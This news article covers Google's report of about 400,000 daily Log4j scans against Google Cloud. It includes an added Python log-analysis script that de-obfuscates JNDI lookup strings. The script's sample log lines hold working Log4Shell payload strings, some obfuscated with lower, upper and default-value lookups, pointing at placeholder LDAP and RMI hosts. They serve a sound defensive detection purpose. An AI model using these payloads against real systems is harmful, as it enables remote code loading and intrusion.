Google says there are as many as 400,000 scans for Log4j vulnerabilities against Google Cloud each day, suggesting that IT professionals need to continue to be vigilant and ensure that they remediate vulnerable systems.
The claim comes in Google’s Threat Horizons Executive Snapshot this month, a quarterly report from the company’s Cybersecurity Action Team. Google Cloud continues to see 400,000 scans each day, and the company believes other cloud providers are seeing similar, if not more, scanning levels.
It’s unclear whether the scanning is primarily on behalf of security researchers or adversaries, but what is clear is that this vulnerability is not simply going away any time soon as both groups continue to scan for vulnerable Log4j instances.
According to Google, the company is still seeing 400,000 scans for Log4j vulnerabilities against Google Cloud each day, and similar scanning levels against other providers are widely expected.
The company says threat actors are predominantly targeting ports 80 and 443, although scanners are sending payloads to many other ports as well. The attack payloads largely point the vulnerable application at attacker-controlled Lightweight Directory Access Protocol (LDAP) servers, which mostly listen on TCP ports 389 and 1389.
Google adds that threat actors are refining ways of obfuscating the Log4j lookup string: the earliest payloads began with the plain `${jndi:ldap://` prefix, and attackers have since moved to strings that are harder to parse and to match with simple signatures.
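To make the obfuscation point concrete, the following is an added detection example, not code from Google's report or from the Log4j project. It resolves the three Log4j lookup tricks most often used to hide the `${jndi:` prefix (the `${lower:x}` and `${upper:x}` lookups and the `${name:-default}` default-value syntax), then reports the JNDI scheme, host and port in each payload and flags the two LDAP ports named above. The log lines are constructed for the example, and the IP addresses in them are documentation ranges, not real attacker infrastructure.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Innermost Log4j lookup: "${...}" whose body contains no further "${" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A de-obfuscated JNDI lookup: "${jndi:<scheme>:<rest>}". Log4j lower-cases
# the lookup prefix before dispatching it, so the match is case-insensitive.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):([^}]*)\}", re.IGNORECASE)
# The two LDAP listener ports the report names as most common.
LDAP_PORTS = {389, 1389}


def _resolve(body: str) -> Optional[str]:
    """Evaluate one innermost lookup body the way an attacker relies on Log4j doing it.

    Only the three primitives used for obfuscation are modelled (assumption: real
    Log4j resolves many more, e.g. date/sys/env with live values). The jndi lookup
    itself and anything unknown are left in place by returning None.
    """
    prefix, _, arg = body.partition(":")
    if prefix.lower() == "jndi":
        return None
    # Default-value syntax "${name:-default}": an unknown or empty name evaluates
    # to the default, so "${::-j}" and "${env:NaN:-j}" both become "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return None


def normalize_lookups(text: str, max_rounds: int = 64) -> str:
    """Resolve innermost lookups repeatedly until the string stops changing.

    Innermost-first is the order Log4j itself evaluates nested lookups in;
    max_rounds bounds the work on pathological input.
    """
    def _sub(m: "re.Match[str]") -> str:
        resolved = _resolve(m.group(1))
        return m.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(_sub, text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> List[Dict[str, object]]:
    """Return one record per JNDI lookup found in the de-obfuscated line."""
    hits: List[Dict[str, object]] = []
    for m in _JNDI.finditer(normalize_lookups(line)):
        scheme, rest = m.group(1).lower(), m.group(2)
        parts = urlsplit(f"{scheme}:{rest}")  # "ldap://host:1389/a" -> netloc "host:1389"
        try:
            port = parts.port
        except ValueError:  # malformed port in the URL
            port = None
        hits.append({
            "scheme": scheme,
            "host": parts.hostname,
            "port": port,
            "common_ldap_port": port in LDAP_PORTS,
        })
    return hits


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run detection over access-log lines; one record per line that carries a payload."""
    findings: List[Dict[str, object]] = []
    for i, line in enumerate(lines):
        hits = find_jndi(line)
        if hits:
            findings.append({"line": i, "hits": hits})
    return findings


# Constructed sample access-log lines (User-Agent field carries the payload).
SAMPLE_LOG = [
    # plain payload, the form the earliest scanners sent
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    # lower: lookups hiding the jndi keyword
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:j}${lower:n}${lower:d}i:ldap://198.51.100.7:389/a}"',
    # default-value syntax spelling out both "jndi" and "ldap"
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"',
    # mixed tricks plus a non-LDAP scheme with no explicit port
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:${lower:RMI}://198.51.100.7/obj}"',
    # benign request
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The normalizer is deliberately a log-analysis aid rather than a blocking rule: because Log4j evaluates lookups recursively, any fixed list of obfuscation primitives can be bypassed by one the list does not model, so a signature like this is for hunting and triage, and the only durable fix remains patching or removing the vulnerable Log4j versions.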
“Adversaries and researchers alike are continuing to scour the web looking for vulnerable instances of Log4j,” Google’s report says. “As a result, service providers have been and continue to work with their cloud customers to ensure the infrastructure is secure as well as check the status of customer-installed tools and third-party dependencies in their environments to see if they are affected. While adversaries continue to knock on this door, observations have shown that they are opting to use known open-source tools, native Cloud services, and previously established domains for persistence in their attacks.”
Google points Google Cloud admins to several Google Cloud-specific mitigations, including the company’s Cloud Armor solution, Java scanning feature, and threat hunting tools.
Read the company’s report for more mitigations.